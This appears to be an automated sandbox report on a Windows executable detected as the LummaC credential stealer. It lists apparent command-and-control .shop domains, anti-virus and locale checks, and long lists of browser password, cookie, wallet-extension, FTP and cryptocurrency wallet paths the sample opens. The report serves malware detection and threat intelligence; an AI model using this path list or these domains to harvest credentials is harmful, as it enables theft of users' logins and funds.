Source: nayfObR.exe, 00000000.00000002.2031155271.000000000370F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: nayfObR.exe, 00000000.00000002.2031155271.000000000370F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: nayfObR.exe, 00000000.00000002.2031155271.000000000370F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: nayfObR.exe, 00000000.00000002.2031155271.000000000370F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: nayfObR.exe, 00000000.00000002.2031155271.000000000370F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: nayfObR.exe, 00000000.00000002.2031155271.000000000370F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: nayfObR.exe, 00000000.00000002.2031155271.000000000370F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: nayfObR.exe, 00000000.00000002.2031155271.000000000370F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: fancywaxxers.shop

Source: C:\Users\user\Desktop\nayfObR.exe

Process created: C:\Users\user\Desktop\nayfObR.exe "C:\Users\user\Desktop\nayfObR.exe"

Jump to behavior

Source: C:\Users\user\Desktop\nayfObR.exe	Code function: GetLocaleInfoW,	0_2_005BA8F0
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: EnumSystemLocalesW,	0_2_005BA883
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: EnumSystemLocalesW,	0_2_005BA9C5
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: EnumSystemLocalesW,	0_2_005B61FD
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: GetLocaleInfoW,	0_2_005BAA10
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_005BAAB7
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_005BA337
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: GetLocaleInfoW,	0_2_005BABBD
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: GetLocaleInfoW,	0_2_005B5CF5
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: EnumSystemLocalesW,	0_2_005BA588
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_005BA630

Source: C:\Users\user\Desktop\nayfObR.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\nayfObR.exe

Code function: 0_2_005A9F05 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_005A9F05

Source: C:\Users\user\Desktop\nayfObR.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: nayfObR.exe, 00000003.00000003.2183649716.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183544269.00000000030C3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\nayfObR.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: nayfObR.exe PID: 6540, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: nayfObR.exe	String found in binary or memory: %appdata%\Electrum\wallets
Source: nayfObR.exe	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: nayfObR.exe	String found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: nayfObR.exe, 00000003.00000003.2102040134.00000000030C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: nayfObR.exe, 00000003.00000003.2220700165.000000000308C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: nayfObR.exe	String found in binary or memory: Wallets/Exodus
Source: nayfObR.exe	String found in binary or memory: %appdata%\Ethereum
Source: nayfObR.exe, 00000003.00000003.2101907540.0000000003099000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: nayfObR.exe	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
